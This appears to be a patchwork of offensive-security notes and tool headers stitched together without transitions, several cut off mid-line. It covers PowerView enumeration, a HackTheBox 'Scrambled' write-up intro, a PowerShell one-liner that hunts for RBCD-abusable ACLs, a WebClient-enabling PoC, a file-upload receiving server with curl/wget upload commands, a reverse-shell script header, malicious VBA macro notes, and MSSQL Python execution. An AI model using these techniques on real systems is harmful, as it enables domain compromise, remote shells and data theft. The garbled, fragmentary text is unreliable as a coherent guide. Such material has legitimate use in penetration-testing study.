- Getting domain info
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : 'find' specific data entries in a data set
Let's pwn the box Scrambled from HackTheBox using only CrackMapExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:
"smbclient won't work, and I wasn't able to get crackmapexec to work either."
To be fair, at the time of his writeup it was true, but not anymore: it's pretty simple with CME, 5 minutes and you get root :)
Note: I will skip the web part, where we get one username: ksimpson
# Get all user SIDs, all computer object ACLs, and find RBCD!!!
$usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } }
# Get all group SIDs (excluding the built-in privileged groups), all computer object ACLs, and find RBCD
$groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage
using System.Runtime.InteropServices;
using System;
/*
 * Simple C# PoC to enable WebClient Service Programmatically
 * Based on the C++ version from @tiraniddo (James Forshaw)
 * Twitter: https://twitter.com/tiraniddo
 * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
 *
 * Compile with:
#!/usr/bin/env python
"""Extend Python's built in HTTP server to save files
curl or wget can be used to send files with options similar to the following
curl -X PUT --upload-file somefile.txt http://localhost:8000
wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt
__Note__: curl automatically appends the filename onto the end of the URL so
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. Its only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem (self-signed certificate plus private key) with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer  # Python 2 module names
import ssl
This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glance before setting up a payload.
All of the examples below were generated using 192.168.56.101 as the remote address.
List:
MSSQL 2017 includes Microsoft Machine Learning Services, which allows the execution of Python and R scripts within MSSQL via sp_execute_external_script. This is an expansion of the functionality available in MSSQL 2016, which allowed the execution of R scripts with SQL Server R Services. Examples of how to abuse this functionality with R scripts are available elsewhere.
To execute Python code, the following must be in place:
- Machine Learning Services (In-Database) and Python must have been selected during installation
- External scripts must be enabled on the instance:
EXEC sp_configure 'external scripts enabled', 1
RECONFIGURE WITH OVERRIDE
- The executing login needs the EXECUTE ANY EXTERNAL SCRIPT permission